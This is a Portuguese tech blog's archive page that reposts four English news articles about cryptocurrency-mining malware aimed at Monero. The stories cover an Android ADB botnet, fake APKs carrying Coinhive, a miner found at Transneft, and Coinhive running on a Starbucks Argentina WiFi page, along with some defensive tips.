Alayon - Tecnologia da Informação : Monero

Mostrando postagens com marcador Monero. Mostrar todas as postagens

terça-feira, 6 de fevereiro de 2018

NEW MONERO CRYPTO MINING BOTNET LEVERAGES ANDROID DEBUGGING TOOL

by Christopher Kanaracus em 05/02/2018 no site Threatpost

A new botnet that distributes malware for mining Monero cryptocurrency has emerged, infecting Android devices through a port linked with a debugging tool for the OS, according to researchers at Qihoo 360 Netlab.

Dubbed ADB.Miner by 360 Netlab, the botnet is gaining entry to Android devices–mostly smartphones and TV boxes–through port 5555, which is associated with Android Debug Bridge, a command-line tool that is used for debugging, installing apps and other purposes.

ADB typically communicates with devices via USB, but it’s also possible for it to use wifi with some setup, according to Android documentation.The botnet propagates itself in “worm”-like fashion, looking for open 5555 ports on other devices, most of which are Android-based, 360 Netlab researcher Hui Wang said in a blog post.

Notably, it uses some port scanning code from the Mirai botnet, which is the first time Mirai code has been used to target Android devices, he claimed. Mirai, which emerged in August 2016, has historically been used to attack Linux devices.

Most of the Android devices being targeted by ADB.Miner are located in China and South Korea, but 360 Netlab is not identifying any of them at this time.

“Overall, we think there is a new and active worm targeting android system’s adb debug interface spreading, and this worm has probably infected more than 5,000 devices in just 24 hours,” Wang wrote. In fact, 5555 port scanning traffic has hit the top 10, according to 360 Netlab’s own scanning data.

The botnet is distributing malicious code that is mining Monero coins, but as of yet none have been paid out, according to Wang.

Cybercriminals have been increasingly turning to cryptocurrency mining via botnets, with Monero a favored target. Those behind the massive Smominru botnet have generated as much as $3.6 million since May through an army of more than 500,000 infected machines, according to Proofpoint.

Crypto mining botnets have clear advantages over other types of attacks, such as ransomware, since they don’t necessarily require social engineering and by their nature are meant to operate stealthily, stealing nothing from victims but CPU cycles. In fact, crypto miners may be the “new payload of choice” for cybercriminals, researchers at Cisco Talos said recently.

segunda-feira, 8 de janeiro de 2018

Fake Android apps caught dropping Coinhive miner

Por Wagas em 07/01/2018 no site HackRead

In October last year, three Android apps on Play Store were found infected with Coinhive cryptocurrency miner to generate Monero digital coins. Now, an IT security researcher Elliot Alderson found fake Android apps that are infected with Coinhive cryptocurrency miner specially developed to use the CPU power of a targeted device.

Fake App Real Miner

According to Elliot, whose real name is Robert Baptiste, these apps are available on a third-party website that claims to provide free APKs (Android application package) to users but in reality, these APKs are infected with Coinhive miner from the beginning.

“I don’t think these apps are the original apps. The “hacker” modified it and repacked it and after that, he uses multiple dropper apps to distribute these modified apps. Only the package name and the app name has been changed and I just dig up more and in fact, this is the same app 291 times which means there are 291 applications with different icons and names, Baptiste told HackRead.

Upon scanning, some of the APK files available on the site, VirusTotal showed that these files were infected with the Coinhive miner. Remember, secret use of any cryptocurrency miner is considered as using malware against users. To prove the point, last year, CloudFlare booted offone of their customers for secretly using Coinhive miner and not letting site visitors to opt-out or disable the code.

300 fake Android App found infected with Coinhive miner — VirusTotal scan result

A look at the scam website (androidapk.world), that is hosting these malicious apps, shows it has been fully indexed in Google search engine without raising any suspicion. Also, the site claims to provide APKs for top apps including Super Mario Run, Netflix, Mobile Strike, Clash of Clans and others.

Moreover, the site was registered in March last year and since then the download counter shows some APK files have been downloaded millions of times. However, it is unclear if the download counter displays real-time figures or cybercriminals behind the scam are manually displaying the numbers to pose as an active and trustworthy APK download site.

Android Users Be Vigilant

Until now, the biggest victims of cryptocurrency miners were website owners and unsuspecting visitors. Now, Android users are also at risk. In the past, cybercriminals preferred malware attacks but since the price of Bitcoin has suddenly surged there has been an increase in attacks involving cryptocurrency miners.

Android users should be aware of the situation and;


Avoid downloading unnecessary apps from Play Store as well as third-party sites.

 Keep your devices updated

 Make sure to scan it with a reputed anti-malware software

 Keep an eye on your phone's CPU usage

Users On PCs

Those on computers should also be aware of the situation and use Whoismining to see if a site they are about to visit is secretly mining cryptocurrency or not. Furthermore, there are two Chrome extensions No Coin and minerBlock developed to block any crypto miners from using your computing power.

About Elliot Alderson

Elliot Alderson is the same security researcher who in November last year found two pre-installed backdoor apps in OnePlus 5, 3 or its 3T model that would allow attackers to spy and steal personal data from users.

segunda-feira, 18 de dezembro de 2017

Monero Mining Software Found on Oil Transport Company’s Systems

Por David Bisson em 18/12/2017 no site The State of Security

n oil transportation company discovered someone had installed Monero-mining software on its systems without its authorization.

On 14 December, Vladimir Rushailo, vice president of the Russian state-owned transport monopoly Transneft, revealed that the company had found that one of its computers had automatically downloaded software designed to mine the Bitcoin rival. As quoted in a statement provided to Reuters:

Incidents where the company’s hardware was used to manufacture cryptocurrency have been found. It could have a negative impact on the productivity of our processing capacity.

The company subsequently deleted the program from the computer. It also implemented “programs to block such downloads in the future.”

Transneft has not provided any details about what caused the computer to download the cryptocurrency miner, including whether a malicious insider or external actor might have hacked the workstation. What is clear, however, is that these types of attacks are growing in frequency. Pavel Lutsik, a head of information security projects with Croc IT firm, agrees:

More and more people have learn[ed] that, in fact, they do not even need to stand up from the sofa to make money – if they are not caught.

In recent months, several organizations including Ultimate Fighting Championship and Showtime have removed CoinHive and other Monero miners that slowed down visitors’ computers from their websites. Attackers have also gone after companies’ internal networks directly in order to mine cryptocurrencies. F5 threat researchers detected one such campaign dubbed “Zealot” that leverages the Apache Struts Jakarta Multipart Parser attack as well as a flaw affecting the DotNetNuke (DNN) content management system to compromise vulnerable systems. It then leverages EternalSynergy and EternalBlue, the same Microsoft vulnerability exploited by WannaCry and NotPetya, to move laterally inside the network, find Windows and Linux computers, and seize them for mining Monero.

Attackers victimized 1.65 million users with cryptocurrency miners in the first eight months of 2017. No doubt this number will increase to account for the rest of the year.

As reported by RT, Russia intends to create legislation that governs cryptocurrency mining and other related matters by July 2018. This move will no doubt help the state crack down on cryptocurrency mining attacks, especially those involving Russian corporate servers.

At the same time, organizations can take steps to protect themselves against cryptocurrency miners by making sure their computers are up-to-date. To do so, they should build a patch management program that, among other things, gives them complete visibility over all their assets and prioritizes known vulnerabilities based on their business requirements. For information on how Tripwire can help your organization build such a program, click here.

segunda-feira, 11 de dezembro de 2017

In-Store WiFi Provider Used Starbucks Website to Generate Monero Coins

Por Wagas em 11/12/2017 no site de HackRead

The value of Bitcoin is increasing rapidly making it almost impossible for most of the world to invest and that is why users are trying to invest or mine other currencies including Monero digital coin which is around USD 265.

Starbucks And CoinHive Code

On December 2nd, a Twitter user Noah Dinkin sent out a screenshot that showed coffee giant Starbucks’ reward site for Argentina was using CoinHive’s code to generate Monero coins by using CPU power of site’s visitors. In this case, Starbucks’ customers.

In his tweet, Dinkin mentioned that the culprit behind this scheme could be the company’s in-store WiFi provider. However, for last few months cybercriminals have been hacking websitesto place CoinHive code secretly. In fact, just a few days ago researchers identified more than 5,000 sites that were hijacked to insert CoinHive code yet Starbucks direct involvement is still unclear.

“Hi, @Starbucks @StarbucksAr did you know that your in-store wifi provider in Buenos Aires forces a 10-second delay when you first connect to the wifi so it can mine bitcoin using a customer’s laptop? Feels a little off-brand.. cc @GMFlickinger,” the tweet said.

Starbucks is popular for providing free WiFi access to its customers while its reward program lets customers earn reward stars based on the amount of money they spend at Starbucks. But little did the Argentinian customers know that CPU power of their devices was being used to generate Monero coins.

As of now, there has been no response from Starbucks but for customers, the lesson is there is no such thing as “free WiFi.”

How Does CoinHive Work

For those who are unaware of how CoinHive works, it is a company that provides cryptocurrency miner written in Javascript, which sends any coins mined by the browser to the owner of the website. Previously, ThePirateBay and CBS’s ShowTime websites were also caught using the code to generate Monero coins.

Although the general conception is that once a visitor closes the website using cryptocurrency miner, it stops mining however recently, researchers discovered that tons of sites keep using CPU power to mine even if users close the site tab.

Cloudflare Not Cool With Secret Miners

According to CloudFlare, using cryptocurrency mining code without informing users and not providing them the option to opt out is considered as malware. To highlight the seriousness of the matter, the company booted off one of its customers for secretly using cryptocurrency miner.

“Multiple domains in your account were injecting Coinhive mining code without notifying users. … We consider this to be malware, and as such, the account was suspended, and all domains removed from Cloudflare,” Cloudflare told its customer in October said.